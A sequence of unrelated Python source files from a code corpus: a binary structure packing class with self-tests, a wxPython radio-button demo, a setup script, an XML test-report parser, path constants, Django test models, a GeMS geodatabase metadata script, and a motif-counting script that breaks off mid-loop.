addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return
# void specifier
if format[:1] == '_':
if dataClassOrCode != str:
fields = {'self':self, 'inputDataLeft':data}
fields.update(self.fields)
return eval(dataClassOrCode, {}, fields)
else:
return None
# quote specifier
if format[:1] == "'" or format[:1] == '"':
answer = format[1:]
if answer != data:
raise Exception("Unpacked data doesn't match constant value '%r' should be '%r'" % (data, answer))
return answer
# address specifier
two = format.split('&')
if len(two) == 2:
return self.unpack(two[0],data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.unpack(two[0],data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.unpack(two[0],data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = []
sofar = 0
if two[0].isdigit():
number = int(two[0])
elif two[0]:
sofar += self.calcUnpackSize(two[0], data)
number = self.unpack(two[0], data[:sofar])
else:
number = -1
while number and sofar < len(data):
nsofar = sofar + self.calcUnpackSize(two[1],data[sofar:])
answer.append(self.unpack(two[1], data[sofar:nsofar], dataClassOrCode))
number -= 1
sofar = nsofar
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return format % data
# asciiz specifier
if format == 'z':
if data[-1] != '\x00':
raise Exception("%s 'z' field is not NUL terminated: %r" % (field, data))
return data[:-1] # remove trailing NUL
# unicode specifier
if format == 'u':
if data[-2:] != '\x00\x00':
raise Exception("%s 'u' field is not NUL-NUL terminated: %r" % (field, data))
return data[:-2] # remove trailing NUL
# DCE-RPC/NDR string specifier
if format == 'w':
l = unpack('<L', b(data[:4]))[0]
return data[12:12+l*2]
# literal specifier
if format == ':':
return dataClassOrCode(data)
# struct like specifier
if format.find('s') >=0:
return buildStr(unpack(format, b(data))[0])
else:
return unpack(format, b(data))[0]
def calcPackSize(self, format, data, field = None):
#print( " calcPackSize %s:%r" % (format, data))
if field:
addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return 0
# void specifier
if format[:1] == '_':
return 0
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return len(format)-1
# address specifier
two = format.split('&')
if len(two) == 2:
return self.calcPackSize(two[0], data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.calcPackSize(two[0], data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.calcPackSize(two[0], data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = 0
if two[0].isdigit():
if int(two[0]) != len(data):
raise Exception("Array field has a constant size, and it doesn't match the actual value")
elif two[0]:
answer += self.calcPackSize(two[0], len(data))
for each in data:
answer += self.calcPackSize(two[1], each)
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return len(format % data)
# asciiz specifier
if format[:1] == 'z':
return len(data)+1
# asciiz specifier
if format[:1] == 'u':
l = len(data)
return l + (l & 1 and 3 or 2)
# DCE-RPC/NDR string specifier
if format[:1] == 'w':
l = len(data)
return int((12+l+(l % 2)))
# literal specifier
if format[:1] == ':':
return len(data)
# struct like specifier
return calcsize(format)
def calcUnpackSize(self, format, data, field = None):
if self.debug:
print(" calcUnpackSize( %s | %s | %r)" % (field, format, data))
# void specifier
if format[:1] == '_':
return 0
addressField = self.findAddressFieldFor(field)
if addressField is not None:
if not self[addressField]:
return 0
try:
lengthField = self.findLengthFieldFor(field)
return int(self[lengthField])
except:
pass
# XXX: Try to match to actual values, raise if no match
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return len(format)-1
# address specifier
two = format.split('&')
if len(two) == 2:
return self.calcUnpackSize(two[0], data)
# code specifier
two = format.split('=')
if len(two) >= 2:
return self.calcUnpackSize(two[0], data)
# length specifier
two = format.split('-')
if len(two) == 2:
return self.calcUnpackSize(two[0], data)
# array specifier
two = format.split('*')
if len(two) == 2:
answer = 0
if two[0]:
if two[0].isdigit():
number = int(two[0])
else:
answer += self.calcUnpackSize(two[0], data)
number = self.unpack(two[0], data[:answer])
while number:
number -= 1
answer += self.calcUnpackSize(two[1], data[answer:])
else:
while answer < len(data):
answer += self.calcUnpackSize(two[1], data[answer:])
return answer
# "printf" string specifier
if format[:1] == '%':
raise Exception("Can't guess the size of a printf like specifier for unpacking")
# asciiz specifier
if format[:1] == 'z':
return data.index('\x00')+1
# asciiz specifier
if format[:1] == 'u':
l = data.index('\x00\x00')
return l + (l & 1 and 3 or 2)
# DCE-RPC/NDR string specifier
if format[:1] == 'w':
l = unpack('<L', b(data[:4]))[0]
return 12+l*2
# literal specifier
if format[:1] == ':':
return len(data)
# struct like specifier
return calcsize(format)
def calcPackFieldSize(self, fieldName, format = None):
    """Return the packed size of `fieldName`, looking up its declared
    format from the structure definition when none is supplied."""
    fmt = self.formatForField(fieldName) if format is None else format
    return self.calcPackSize(fmt, self[fieldName])
def formatForField(self, fieldName):
    """Return the format specifier declared for `fieldName`.

    Scans the common header first, then the body; raises when the field
    is not declared anywhere.
    """
    for entry in self.commonHdr + self.structure:
        if entry[0] == fieldName:
            return entry[1]
    raise Exception("Field %s not found" % fieldName)
def findAddressFieldFor(self, fieldName):
    """Return the name of the field whose format ends in '&<fieldName>'
    (the pointer/address companion of `fieldName`), or None."""
    suffix = '&%s' % fieldName
    for entry in self.commonHdr + self.structure:
        if entry[1].endswith(suffix):
            return entry[0]
    return None
def findLengthFieldFor(self, fieldName):
    """Return the name of the field whose format ends in '-<fieldName>'
    (the length companion of `fieldName`), or None."""
    suffix = '-%s' % fieldName
    for entry in self.commonHdr + self.structure:
        if entry[1].endswith(suffix):
            return entry[0]
    return None
def dump(self, msg = None, indent = 0, print_to_stdout = True):
    """Render a human-readable dump of all fields: declared fields first
    (in declaration order), then any extra keys, recursing into nested
    Structure values with a deeper indent.

    Returns the rendered string when print_to_stdout is False; otherwise
    prints it and returns None.
    """
    if msg is None:
        msg = self.__class__.__name__
    ind = ' '*indent
    allstr = "\n%s" % msg
    fixedFields = []
    for field in self.commonHdr+self.structure:
        i = field[0]
        if i in self.fields:
            fixedFields.append(i)
            if isinstance(self[i], Structure):
                # nested structure: render one indentation level deeper
                tempstr = self[i].dump('%s%s:{' % (ind, i), indent = indent + 4, print_to_stdout = False)
                allstr += tempstr + "\n%s}" % ind
            else:
                allstr += "\n%s%s: {%r}" % (ind, i, self[i])
    # Do we have remaining fields not defined in the structures? let's
    # print them.
    # (set difference: order of these extras is unspecified)
    remainingFields = list(set(self.fields) - set(fixedFields))
    for i in remainingFields:
        if isinstance(self[i], Structure):
            tempstr = self[i].dump('%s%s:{' % (ind, i), indent = indent + 4, print_to_stdout = False)
            allstr += tempstr + "\n%s}" % ind
        else:
            allstr += "\n%s%s: {%r}" % (ind, i, self[i])
    # Finish job.
    if not print_to_stdout:
        # print(allstr) # Uncomment this line only for view that test is OK with "print_to_stdout = False".
        return allstr
    else:
        print(allstr)
class _StructureTest:
    """Round-trip self-test harness: pack a populated instance, unpack
    the bytes into a new instance, repack, and check that the two byte
    strings match. Subclasses supply `theClass` and `populate`."""
    # Field alignment to use; subclasses override to test aligned packing.
    alignment = 0
    def create(self,data = None):
        # Instantiate the subclass' structure, optionally from raw bytes.
        if data is not None:
            return self.theClass(data, alignment = self.alignment)
        else:
            return self.theClass(alignment = self.alignment)
    def run(self):
        print()
        print("-"*70)
        testName = self.__class__.__name__
        print("starting test: %s....." % testName)
        # pack
        a = self.create()
        self.populate(a)
        a.dump("packing.....")
        a_str = a.getData()
        print("packed: %r, %d" % (a_str,len(a_str)))
        # unpack into a fresh instance
        print("unpacking.....")
        b = self.create(a_str)
        b.dump("unpacked.....")
        # repack and compare byte-for-byte
        print("repacking.....")
        b_str = b.getData()
        if b_str != a_str:
            print("ERROR: original packed and repacked don't match")
            print("packed: %r" % b_str)
class _Test_simple(_StructureTest):
    # Exercises most specifier families in one structure: plain ints, a
    # length companion (len1 -> z1), a count-prefixed array, asciiz,
    # UTF-16, literal quotes, and a computed ('=') code field.
    class theClass(Structure):
        commonHdr = ()
        structure = (
            ('int1', '!L'),
            ('len1','!L-z1'),
            ('arr1','B*<L'),
            ('z1', 'z'),
            ('u1','u'),
            ('', '"COCA'),
            ('len2','!H-:1'),
            ('', '"COCA'),
            (':1', ':'),
            ('int3','>L'),
            ('code1','>L=len(arr1)*2+0x1000'),
        )
    def populate(self, a):
        a['default'] = 'hola'
        a['int1'] = 0x3131
        a['int3'] = 0x45444342
        a['z1'] = 'hola'
        a['u1'] = 'hola'.encode('utf_16_le')
        a[':1'] = ':1234:'
        a['arr1'] = (0x12341234,0x88990077,0x41414141)
        # a['len1'] = 0x42424242
class _Test_fixedLength(_Test_simple):
    # Same as _Test_simple but forces a bogus len1, so repacking after
    # unpack cannot reproduce the original bytes (expected to fail).
    def populate(self, a):
        _Test_simple.populate(self, a)
        a['len1'] = 0x42424242
class _Test_simple_aligned4(_Test_simple):
    # Same round-trip as _Test_simple but with 4-byte field alignment.
    alignment = 4
class _Test_nested(_StructureTest):
    # Exercises Structure-valued fields (nested structures).
    class theClass(Structure):
        class _Inner(Structure):
            structure = (('data', 'z'),)
        structure = (
            ('nest1', ':', _Inner),
            ('nest2', ':', _Inner),
            ('int', '<L'),
        )
    def populate(self, a):
        a['nest1'] = _Test_nested.theClass._Inner()
        a['nest2'] = _Test_nested.theClass._Inner()
        a['nest1']['data'] = 'hola manola'
        a['nest2']['data'] = 'chau loco'
        a['int'] = 0x12345678
class _Test_Optional(_StructureTest):
    # Exercises '&'-address companion fields: pName/pList point at the
    # optional Name/List payloads.
    class theClass(Structure):
        structure = (
            ('pName','<L&Name'),
            ('pList','<L&List'),
            ('Name','w'),
            ('List','<H*<L'),
        )
    def populate(self, a):
        a['Name'] = 'Optional test'
        a['List'] = (1,2,3,4)
class _Test_Optional_sparse(_Test_Optional):
    # Deleting 'Name' exercises an absent optional field (pName packs 0).
    def populate(self, a):
        _Test_Optional.populate(self, a)
        del a['Name']
class _Test_AsciiZArray(_StructureTest):
    # Exercises an array of asciiz (NUL-terminated) strings with a
    # byte count prefix.
    class theClass(Structure):
        structure = (
            ('head','<L'),
            ('array','B*z'),
            ('tail','<L'),
        )
    def populate(self, a):
        a['head'] = 0x1234
        a['tail'] = 0xabcd
        a['array'] = ('hola','manola','te traje')
class _Test_UnpackCode(_StructureTest):
    # Exercises the '=' code specifier: leni is computed from uno when
    # packing, and a void field with an unpack expression recovers the
    # length of uno when unpacking.
    class theClass(Structure):
        structure = (
            ('leni','<L=len(uno)*2'),
            ('cuchi','_-uno','leni/2'),
            ('uno',':'),
            ('dos',':'),
        )
    def populate(self, a):
        a['uno'] = 'soy un loco!'
        a['dos'] = 'que haces fiera'
class _Test_AAA(_StructureTest):
    # Exercises a bit-packed field: iv is assembled from init_vector,
    # pad and keyid on pack, and the three void fields recover the
    # components from iv on unpack (WEP-style header layout).
    class theClass(Structure):
        commonHdr = ()
        structure = (
            ('iv', '!L=((init_vector & 0xFFFFFF) << 8) | ((pad & 0x3f) << 2) | (keyid & 3)'),
            ('init_vector', '_','(iv >> 8)'),
            ('pad', '_','((iv >>2) & 0x3F)'),
            ('keyid', '_','( iv & 0x03 )'),
            ('dataLen', '_-data', 'len(inputDataLeft)-4'),
            ('data',':'),
            ('icv','>L'),
        )
    def populate(self, a):
        a['init_vector']=0x01020304
        #a['pad']=int('01010101',2)
        a['pad']=int('010101',2)
        a['keyid']=0x07
        a['data']="\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9"
        a['icv'] = 0x05060708
        #a['iv'] = 0x01020304
if __name__ == '__main__':
    # Run the round-trip self-tests for each specifier family.
    _Test_simple().run()
    try:
        _Test_fixedLength().run()
    # Fixed: was a bare `except:`, which also swallows KeyboardInterrupt
    # and SystemExit; only real errors are expected here.
    except Exception:
        # The deliberately-bogus len1 breaks repacking; this is expected.
        print("cannot repack because length is bogus")
    _Test_simple_aligned4().run()
    _Test_nested().run()
    _Test_Optional().run()
    _Test_Optional_sparse().run()
    _Test_AsciiZArray().run()
    _Test_UnpackCode().run()
    _Test_AAA().run()
| StarcoderdataPython |
6482146 | # -*- coding: utf-8 -*-
import wx
class MyFrame(wx.Frame):
    """Demo frame showing standalone radio buttons (grouped via
    wx.RB_GROUP) and grouped radio boxes (wx.RadioBox), each with a
    selection-event handler that logs the current choice."""
    def __init__(self):
        wx.Frame.__init__(self, None, -1, "Radio Demo", wx.DefaultPosition, (300, 300))
        panel = wx.Panel(self)
        # Standalone radio buttons
        wx.RadioButton(panel, -1, "AAA", (60, 10), style=wx.RB_GROUP)  # RB_GROUP starts a new button group
        wx.RadioButton(panel, -1, "BBB", (60, 30))  # belongs to the group opened above
        self.radio3 = wx.RadioButton(panel, -1, "aaa", (60, 60), style=wx.RB_GROUP)  # a new RB_GROUP starts a second group
        self.radio4 = wx.RadioButton(panel, -1, "bbb", (60, 80))
        self.radio3.Bind(wx.EVT_RADIOBUTTON, self.onRadio1)
        self.radio4.Bind(wx.EVT_RADIOBUTTON, self.onRadio2)
        # Radio boxes (pre-grouped radio controls)
        list1 = ["radio5", "radio6"]
        list2 = ['radio7', 'radio8']
        self.rb1 = wx.RadioBox(panel, -1, "Group One", (60, 110), wx.DefaultSize, list1, 2, wx.RA_SPECIFY_COLS)
        self.rb2 = wx.RadioBox(parent=panel,             # parent window
                               id=-1,                    # control id
                               label="Group Two",        # box label (optional)
                               pos=(60, 170),            # position
                               size=wx.DefaultSize,      # size
                               choices=list2,            # option labels
                               majorDimension=2,         # number of rows or columns shown
                               style=wx.RA_SPECIFY_ROWS)  # layout style
        self.rb1.Bind(wx.EVT_RADIOBOX, self.onRadioBox1)
        self.rb2.Bind(wx.EVT_RADIOBOX, self.onRadioBox2)
    def onRadio1(self, event):
        # Log the checked state of the "aaa" button.
        print("# aaa - ", self.radio3.GetValue())
    def onRadio2(self, event):
        print("$ bbb - ", self.radio4.GetValue())
    def onRadioBox1(self, event):
        # GetSelection() returns the zero-based index of the chosen option.
        print("# list1 - ", self.rb1.GetSelection())
    def onRadioBox2(self, event):
        print("$ list2 - ", self.rb2.GetSelection())
if __name__ == "__main__":
app = wx.App()
frame = MyFrame()
frame.Show()
app.MainLoop()
# ### 控件
# 使用已有控件可以简洁地创建一些界面,简化GUI编程;
# 标准控件包括单选框、复选框、列表框、组合框等;
#
# ### 单选框(wx.RadioButton类)
# https://docs.wxpython.org/wx.RadioButton.html
# 多个选项中选择其中的一个时,其他的选项会自动被设置为未选中状态;
#
# ### 单选框分组(wx.RadioBox类)
# https://docs.wxpython.org/wx.RadioBox.html
# 相关的单选框放置在同一组,但只能选择其中的一个选项,其他的单选框会自动被设置为未选中状态;
# 常用函数:
# - GetCount() - 返回单选框分组中选项的数量
# - FindString(string) - 根据给定的标签返回相关按钮的整数索引值,如果标签不存在,则返回-1
# - EnabelItem(n,flag) - 设置索引为n的按钮是否有效,flag是一个布尔值
# - SetItemLabel(n,string) - 设置索引为n的按钮的字符串标签
# - GetItemLabel(n) - 获取索引为n的按钮的字符串标签
# - GetSelection() - 获取被选择的整数索引
# - GetStringSelection() - 获取被选择的字符串信息
# - SetSelection(n) - 使索引为n的单选框被选中
| StarcoderdataPython |
1803118 | <gh_stars>1-10
from setuptools import setup

# NOTE(review): `required` is read here but never passed to setup();
# the hard-pinned install_requires list below is what is actually used.
# Confirm which of the two is meant to be authoritative.
with open('requirements.txt') as f:
    required = f.read().splitlines()

# Package metadata and pinned runtime dependencies.
setup(name='python-spectacles',
      version='1.4.2',
      description='Description',
      author=u'<NAME>',
      license='MIT',
      packages=['spectacles'],
      install_requires=[
          'splinter==0.7.5',
          'requests==2.10.0',
          'PyYAML==3.11',
          'click==6.6'
      ],
      zip_safe=False)
6478957 | from typing import Set
from xml.etree import ElementTree
from linty_fresh.problem import TestProblem
def _last_nonempty_text(node, tag):
    """Return the text of the last child <tag> element that has any text."""
    value = None
    for child in node.findall(tag):
        if child.text:
            value = child.text
    return value


def parse(contents: str, **kwargs) -> Set[TestProblem]:
    """Parse an XML test report, returning one TestProblem per failed
    test result that carries both a message and a stack trace."""
    problems = set()
    try:
        root = ElementTree.fromstring(contents)
    except ElementTree.ParseError:
        # Unparseable report: report no problems rather than crash.
        return problems
    for test in root.findall('test'):
        if test.get('status') != 'FAIL':
            continue
        test_group = test.get('name')
        for test_result in test.findall('testresult'):
            message = _last_nonempty_text(test_result, 'message')
            stack_trace = _last_nonempty_text(test_result, 'stacktrace')
            if stack_trace and message:
                problems.add(TestProblem(
                    test_group,
                    test_result.get('name'),
                    message,
                    stack_trace,
                ))
    return problems
| StarcoderdataPython |
1844224 | <filename>interspeechmi/src/interspeechmi/data_handling/constants.py
import os

from interspeechmi.constants import DATA_DIR

# Directory layout for the AnnoMI data: raw download area plus a
# preprocessed subdirectory.
ANNO_MI_DATA_DIR = os.path.join(DATA_DIR, "anno_mi")
ANNO_MI_PREPROCESSED_DATA_DIR = os.path.join(ANNO_MI_DATA_DIR, "preprocessed")

for data_dir in [
    ANNO_MI_DATA_DIR,
    ANNO_MI_PREPROCESSED_DATA_DIR,
]:
    # Fixed: makedirs(..., exist_ok=True) also creates missing parent
    # directories and avoids the race between the original isdir() check
    # and mkdir() call.
    os.makedirs(data_dir, exist_ok=True)

###########################################
# Source archive and the derived dataset file paths.
ANNO_MI_URL = "https://github.com/uccollab/AnnoMI/archive/refs/heads/main.zip"
ANNO_MI_DATASET_ZIP_PATH = os.path.join(ANNO_MI_DATA_DIR, "anno_mi_dataset.zip")
ANNO_MI_DATASET_DIR = os.path.join(ANNO_MI_DATA_DIR, "anno_mi_dataset")
ANNO_MI_PATH = os.path.join(ANNO_MI_DATASET_DIR, "dataset.csv")
ANNO_MI_NORMALIZED_PATH = os.path.join(ANNO_MI_PREPROCESSED_DATA_DIR, "dataset.normalized.csv")
ANNO_MI_NORMALIZED_AUGMENTED_PATH = os.path.join(ANNO_MI_PREPROCESSED_DATA_DIR, "dataset.normalized.augmented.csv")
###########################################
| StarcoderdataPython |
8088026 | <gh_stars>10-100
# This module is used as a placeholder for the registration of test models.
# It is intentionally empty; individual tests create and register models
# that will appear to Django as if they are in this module.
from __future__ import unicode_literals
from django.db import models
class BaseTestModel(models.Model):
    """Base class for test-created models.

    This is intended to be used for all models that are created during unit
    test runs. It sets the appropriate app to ensure that models aren't
    grouped under the ``django_evolution`` app.
    """
    class Meta:
        # Abstract: no database table is created for this base class.
        abstract = True
        # Group all test models under the 'tests' app label.
        app_label = 'tests'
| StarcoderdataPython |
1716518 | ## Note that Metadata Translation tools must run in 32-bit Python.
import sys, os, os.path, arcpy
from GeMS_utilityFunctions import *
from xml.dom.minidom import *
import codecs
# Module-level configuration: version banner, update check, and the
# boilerplate citation text embedded in the generated FGDC metadata.
debug = False
versionString = 'GeMS_FGDC1_Arc10.py, version of 5 October 2021'
rawurl = 'https://raw.githubusercontent.com/usgs/gems-tools-arcmap/master/Scripts/GeMS_FGDC1_Arc10.py'
checkVersion(versionString, rawurl, 'gems-tools-arcmap')
addMsgAndPrint(' '+ versionString)
if debug:
    addMsgAndPrint(os.sys.path)
    addMsgAndPrint('Python version = '+str(sys.version))
gems = 'GeMS'
gemsFullRef = '"GeMS (Geologic Map Schema)--a standard format for the digital publication of geologic maps", available at http://ngmdb.usgs.gov/Info/standards/GeMS/'
eaoverviewCitation = 'Detailed descriptions of entities, attributes, and attribute values are given in metadata for constituent elements of the database. See also '+gemsFullRef+'.'
# Path to the ArcGIS Desktop metadata translator used for export.
translator = arcpy.GetInstallInfo("desktop")["InstallDir"]+'Metadata/Translator/ARCGIS2FGDC.xml'
###########################################
def __newElement(dom,tag,text):
    """Create and return a new element <tag> whose only child is a text
    node containing `text`.

    NOTE(review): str(...).decode("utf-8") only exists on Python 2 byte
    strings; this module is Python 2 only (see the `<>` operators used
    later in the file).
    """
    nd = dom.createElement(tag)
    ndText = dom.createTextNode(str(text).decode("utf-8"))
    nd.appendChild(ndText)
    return nd
def __appendOrReplace(rootNode,newNode,nodeTag):
    """Attach `newNode` under `rootNode`, replacing the first existing
    descendant element with tag `nodeTag` when one is present."""
    existing = rootNode.getElementsByTagName(nodeTag)
    if existing:
        rootNode.replaceChild(newNode, existing[0])
    else:
        rootNode.appendChild(newNode)
def purgeChildren(dom,nodeTag):
    """Remove every child of every element named `nodeTag` in `dom`,
    returning the (mutated) dom for chaining."""
    for node in dom.getElementsByTagName(nodeTag):
        while node.hasChildNodes():
            node.removeChild(node.lastChild)
    return dom
def eaoverviewDom(dom,eainfo,eaoverText,edcTxt):
    """Append an <overview> node (containing <eaover> and <eadetcit>)
    to `eainfo`, returning the dom."""
    overview = dom.createElement('overview')
    overview.appendChild(__newElement(dom, 'eaover', eaoverText))
    overview.appendChild(__newElement(dom, 'eadetcit', edcTxt))
    eainfo.appendChild(overview)
    return dom
def addSupplinf(dom,supplementaryInfo):
    """Set (or replace) idinfo/descript/supplinf to `supplementaryInfo`,
    creating the <descript> node under <idinfo> when it does not exist.

    Returns the mutated dom.
    """
    try:
        rtNode = dom.getElementsByTagName('descript')[0]
    # Fixed: was a bare `except:`; only the empty-NodeList indexing is
    # expected to fail here, and a bare except would also hide real
    # errors (e.g. a missing <idinfo> raising inside the handler).
    except IndexError:
        rootNode = dom.getElementsByTagName('idinfo')[0]
        descNode = __newElement(dom,'descript','')
        rootNode.appendChild(descNode)
        rtNode = dom.getElementsByTagName('descript')[0]
    siNode = __newElement(dom,'supplinf',supplementaryInfo)
    __appendOrReplace(rtNode,siNode,'supplinf')
    return dom
def writeGdbDesc(gdb):
    """Build a one-paragraph description of the geodatabase: every
    standalone table (with row count), then every feature dataset with
    its feature classes (with feature counts).

    Relies on arcpy workspace state; numberOfRows comes from
    GeMS_utilityFunctions.
    """
    desc = 'Database '+os.path.basename(gdb)+' contains the following elements: '
    arcpy.env.workspace = gdb
    for aTable in arcpy.ListTables():
        desc = desc+'non-spatial table '+ aTable+' ('+str(numberOfRows(aTable))+' rows); '
    for anFds in arcpy.ListDatasets():
        desc = desc + 'feature dataset '+anFds+' which contains '
        fcs = arcpy.ListFeatureClasses('','All',anFds)
        if len(fcs) == 1:
            desc = desc + 'feature class '+fcs[0]+' ('+str(numberOfRows(fcs[0]))+' features); '
        else:
            # Oxford-style list: "a (n), b (n), and c (n); "
            for n in range(0,len(fcs)-1):
                desc = desc+'feature class '+fcs[n]+' ('+str(numberOfRows(fcs[n]))+' features), '
            lastn = len(fcs)-1
            desc = desc+'and feature class '+fcs[lastn]+' ('+str(numberOfRows(fcs[lastn]))+' features); '
    # Replace the trailing '; ' with '. ' to end the sentence.
    desc = desc[:-2]+'. '
    return desc
def writeDomToFile(workDir,dom,fileName):
    """Serialize `dom` as UTF-8 XML to workDir/fileName; characters that
    cannot be encoded become XML character references."""
    if debug:
        addMsgAndPrint(arcpy.env.workspace)
        addMsgAndPrint('fileName='+fileName)
    outf = os.path.join(workDir,fileName)
    with codecs.open(outf, "w", encoding="utf-8", errors="xmlcharrefreplace") as out:
        dom.writexml(out, encoding="utf-8")
###########################################
# ---- main script body (Python 2 / ArcGIS Desktop only) ----
# Resolve input geodatabase and derived output paths.
inGdb = sys.argv[1]
inGdb = os.path.abspath(inGdb)
wksp = os.path.dirname(inGdb)
xmlGdb = inGdb[:-4]+'-metadata.xml'
mrXML = xmlGdb
dataSources = os.path.join(inGdb, 'DataSources')
addMsgAndPrint(' DataSources = '+dataSources)
# export master record
if debug:
    addMsgAndPrint(' inGdb = '+inGdb)
    addMsgAndPrint(' translator = '+translator)
    addMsgAndPrint(' mrXML = '+mrXML)
if os.path.exists(mrXML):
    os.remove(mrXML)
arcpy.ExportMetadata_conversion(inGdb,translator,mrXML)
addMsgAndPrint(' Metadata for '+os.path.basename(inGdb)+' exported to file ')
addMsgAndPrint(' '+mrXML)
# parse mrXML to DOM
try:
    with open(mrXML) as xml:
        domMR = parse(xml)
    #domMR = xml.dom.minidom.parse(mrXML)
    addMsgAndPrint(' Master record parsed successfully')
except:
    addMsgAndPrint(arcpy.GetMessages())
    addMsgAndPrint('Failed to parse '+mrXML)
    raise arcpy.ExecuteError
    # NOTE(review): unreachable -- the raise above exits first.
    sys.exit()
# add supplinfo
addMsgAndPrint(' Adding supplinfo')
gdbDesc1 = (' is a composite geodataset that conforms to '+gemsFullRef+'. '+
    'Metadata records associated with each element within the geodataset contain '+
    'more detailed descriptions of their purposes, constituent entities, and attributes. ')
gdbDesc2 = ('An OPEN shapefile versions of the dataset is also available. It consists '+
    'of shapefiles, DBF files, and delimited text files and retains all information in the native '+
    'geodatabase, but some programming will likely be necessary to assemble these components into '+
    'usable formats.')
supplementaryInfo = os.path.basename(inGdb)+gdbDesc1+gdbDesc2
supplementaryInfo = supplementaryInfo+ ' These metadata were prepared with the aid of script '+versionString+'.'
domMR = addSupplinf(domMR,supplementaryInfo)
# identify/create dataqual node
addMsgAndPrint(' Adding dataqual')
try:
    dataqual = domMR.getElementsByTagName('dataqual')[0]
except:
    rtNode = domMR.getElementsByTagName('metadata')[0]
    dataqual = domMR.createElement('dataqual')
    rtNode.appendChild(dataqual)
# dataqual/attracc/attraccr (statement referring user to IdConf and ExConf fields)
attraccrText = 'Confidence that a feature exists and confidence that a feature is correctly identified are described in per-feature attributes ExistenceConfidence and IdentityConfidence.'
attraccr = __newElement(domMR,'attraccr',attraccrText)
attracc = domMR.createElement('attracc')
attracc.appendChild(attraccr)
dataqual.appendChild(attracc)
# dataqual/posacc/horizpa/horizpar (statement referring user to LCM fields in fc)
horizparText = 'Estimated accuracy of horizontal location is given on a per-feature basis by attribute LocationConfidenceMeters. Values are expected to be correct within a factor of 2. A LocationConfidenceMeters value of -9 or -9999 indicates that no value has been assigned.'
horizpar = __newElement(domMR,'horizpar',horizparText)
horizpa = domMR.createElement('horizpa')
posacc = domMR.createElement('posacc')
horizpa.appendChild(horizpar)
posacc.appendChild(horizpa)
dataqual.appendChild(posacc)
# add dataqual/lineage/srcinfo
if arcpy.Exists(dataSources):
    if numberOfRows(dataSources) > 0:
        ## lineage node
        try:
            lineage = domMR.getElementsByTagName('lineage')[0]
        except:
            rtNode = domMR.getElementsByTagName('dataqual')[0]
            lineage = domMR.createElement('lineage')
            rtNode.appendChild(lineage)
        ## get rid of any existing srcinfo nodes
        # NOTE(review): 'domMr' (lowercase r) looks like a typo for domMR;
        # harmless because purgeChildren mutates its argument in place.
        domMr = purgeChildren(domMR,'srcinfo')
        ## add successive srcinfo nodes
        fields = ['DataSources_ID','Source','Notes','URL']
        ## for each row in dataSources, create
        ## srcinfo
        ## srccite
        ## citeinfo
        ## title Source
        ## onlink URL
        ## srccitea DataSource_ID
        with arcpy.da.SearchCursor(dataSources, fields) as cursor:
            for row in cursor:
                addMsgAndPrint(row[0])
                srcinfo = domMR.createElement('srcinfo')
                srccite = domMR.createElement('srccite')
                citeinfo = domMR.createElement('citeinfo')
                # title = Source text, with Notes appended when present
                titleText = str(row[1].encode("ASCII",'ignore'))
                if row[2] <> None:
                    titleText = titleText + ' '+str(row[2])
                title = __newElement(domMR,'title',titleText)
                citeinfo.appendChild(title)
                if row[3] <> None:
                    onlink = __newElement(domMR,'onlink',row[3])
                    citeinfo.appendChild(onlink)
                srccite.appendChild(citeinfo)
                srcinfo.appendChild(srccite)
                srccitea = __newElement(domMR,'srccitea',row[0])
                srcinfo.appendChild(srccitea)
                lineage.appendChild(srcinfo)
### add eaoverview
addMsgAndPrint(' Adding eainfo')
# get rid of any existing eainfo
domMr = purgeChildren(domMR,'eainfo')
# ensure that there is an eainfo node
try:
    addMsgAndPrint(' getting eainfo 1a')
    eanode = domMR.getElementsByTagName('eainfo')[0]
except:
    addMsgAndPrint(' getting eainfo 1b')
    rtNode = domMR.getElementsByTagName('metadata')[0]
    addMsgAndPrint(' getting eainfo 1b1')
    eanode = domMR.createElement('eainfo')
    addMsgAndPrint(' getting eainfo 1b2')
    rtNode.appendChild(eanode)
addMsgAndPrint(' getting eainfo 3')
eainfo = domMR.getElementsByTagName('eainfo')[0]
addMsgAndPrint(' getting eainfo 4')
gdbDesc = writeGdbDesc(inGdb) # listing of all tables, feature datasets, feature classes
addMsgAndPrint(' getting eainfo 5')
domMR = eaoverviewDom(domMR,eainfo,gdbDesc,eaoverviewCitation)
# write domMR to mrXML
testAndDelete(mrXML)
addMsgAndPrint(' Writing Dom to file')
writeDomToFile(wksp,domMR,mrXML)
addMsgAndPrint('DONE')
| StarcoderdataPython |
1925397 | #!/usr/bin/env python
import sys
import sqlite3
import numpy as np
import matplotlib.pyplot as plt
# Bin width (bp) used by the positional-histogram analysis that was
# commented out of _main below; kept for reference.
BINSIZE = 10
def _main(args):
    """Count, per motif matrix, how many peaks in the .xls file have at
    least one patser hit within +/- window bp of the peak summit.

    args: [mgap_motif_db, xls_path, window]
    Prints one tab-separated line per motif: name, hit count, and the
    fraction of peaks hit.
    """
    if len(args) != 3:
        print ("usage: mgap_txn_start_motif_count.py <mgap_motif_db> <xls> <window>")
        sys.exit(1)
    con = sqlite3.connect(args[0])
    con.row_factory = sqlite3.Row
    cur = con.cursor()
    cur.execute("""select * from matrix""")
    matrices = cur.fetchall()
    win = int(args[2])
    # Per-motif count of peaks with at least one hit inside the window.
    hit_cnt = {}
    for m in matrices:
        hit_cnt[m['name']] = 0
    total = 0
    for ln in open(args[1]):
        total += 1
        sp = ln[:-1].split()
        # Peak position = region start + summit offset.
        pk = int(sp[1]) + int(sp[4])
        for m in matrices:
            cur.execute("""SELECT * FROM patser_hit WHERE ((matrix_key = ?) AND ((chr = ?) AND (start BETWEEN ? AND ?)))""",(m['matrix_key'],sp[0],pk - win,pk + win))
            if len(cur.fetchall()) > 0:
                hit_cnt[m['name']] += 1
    for (name,cnt) in hit_cnt.items():
        # Fixed: this line was a Python 2 print *statement* (a SyntaxError
        # under Python 3, and inconsistent with the function-style print
        # above); the parenthesized form behaves identically on both.
